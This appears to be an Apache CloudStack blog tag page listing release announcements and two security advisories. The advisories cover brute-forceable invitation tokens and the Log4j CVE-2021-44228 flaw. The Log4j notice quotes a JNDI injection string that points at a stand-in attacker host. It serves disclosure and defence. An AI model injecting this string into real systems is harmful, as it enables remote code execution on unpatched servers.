61 posts tagged with "announcement"

Apache CloudStack prior to 4.16.1.0 used insecure random number generation for project invitation tokens. If a project invite is created based only on an email address, a random token is generated. An attacker with knowledge of the project ID and the fact that the invite is sent, could generate time deterministic tokens and brute force attempt to use them prior to the legitimate receiver accepting the invite.

The Apache CloudStack project is pleased to announce the release of CloudStack 4.16.1.0. The CloudStack 4.16.1.0 release is a maintenance release as part of its 4.16.x LTS branch and contains more than 150 fixes and improvements since the CloudStack 4.16.0.0 release. Some of the highlights include:

Apache CloudStack is proven to be one of the most scalable, free and open-source cloud computing operating systems for large-scale private, public, and hybrid clouds. Terraform is an open-source infrastructure as code software tool that provides a consistent CLI workflow to manage resources in many cloud services.

On 9th December 2021, a new zero-day vulnerability for Apache Log4j was reported. It is by now tracked under CVE-2021-44228:

CVE-2021-44228 vulnerability is classified under the highest severity mark and allows an attacker to execute arbitrary code by injecting a sub-string in the form "${jndi:ldap://some.attacker-controlled.site/}" into a logged message. Apache Log4j 2.x is reported to be affected as it performs a lookup (string substitution) using the JNDI protocol, whenever the "${jndi:...}" string is found within a message parameter.

"In the past years, CloudStack has been proving a mature and easy-to-use platform. The released 4.16.0.0 LTS adds new features, enhancements, and bug fixes that will help tech-savy companies stay up to date." said Gabriel Brascher, Vice President of Apache CloudStack.

Apache CloudStack, proven as one of the most scalable, free, and open source cloud computing operating system for large scale private, public, and hybrid clouds, today announced the availability of the latest release of Apache CloudMonkey v6.2.0, the latest version of the turnkey enterprise Cloud orchestration platform's command line interface tool.

The Apache CloudStack project is pleased to announce the release ofCloudStack 4.15.2.0.

The CloudStack 4.15.2.0 release is a maintenance release as part of its 4.15.x LTS branch and contains more than 75 fixes and improvements since the CloudStack 4.15.0.0 release.

The Apache CloudStack project is pleased to announce the release of CloudStack 4.15.1.0. The CloudStack 4.15.1.0 release is a maintenance release as part of its 4.15.x  LTS branch and contains more than 350  fixes and improvements since the CloudStack 4.15.0.0 release.

The Apache CloudStack project is pleased to announce the release of CloudStack 4.14.1.0 as part of its LTS 4.14.x releases. The CloudStack 4.14.1.0 release is a maintenance release and contains more than 100 fixes and improvements since the CloudStack 4.14.0.0 release.

The Apache CloudStack Project Releases Apache® CloudStack® v4.15

Mature Open Source Enterprise Cloud platform powers billions of dollars in transactions for the world's largest Cloud providers, Fortune 5 multinationals, educational institutions, and more.

Wilmington, DE —19 January 2021— The Apache CloudStack Project announced today v4.15 of Apache® CloudStack®, the mature, turnkey Open Source enterprise Cloud orchestration platform.

Apache CloudStack is the proven, highly scalable IaaS platform of choice to rapidly and easily create private, public, and hybrid Cloud environments: it "just works".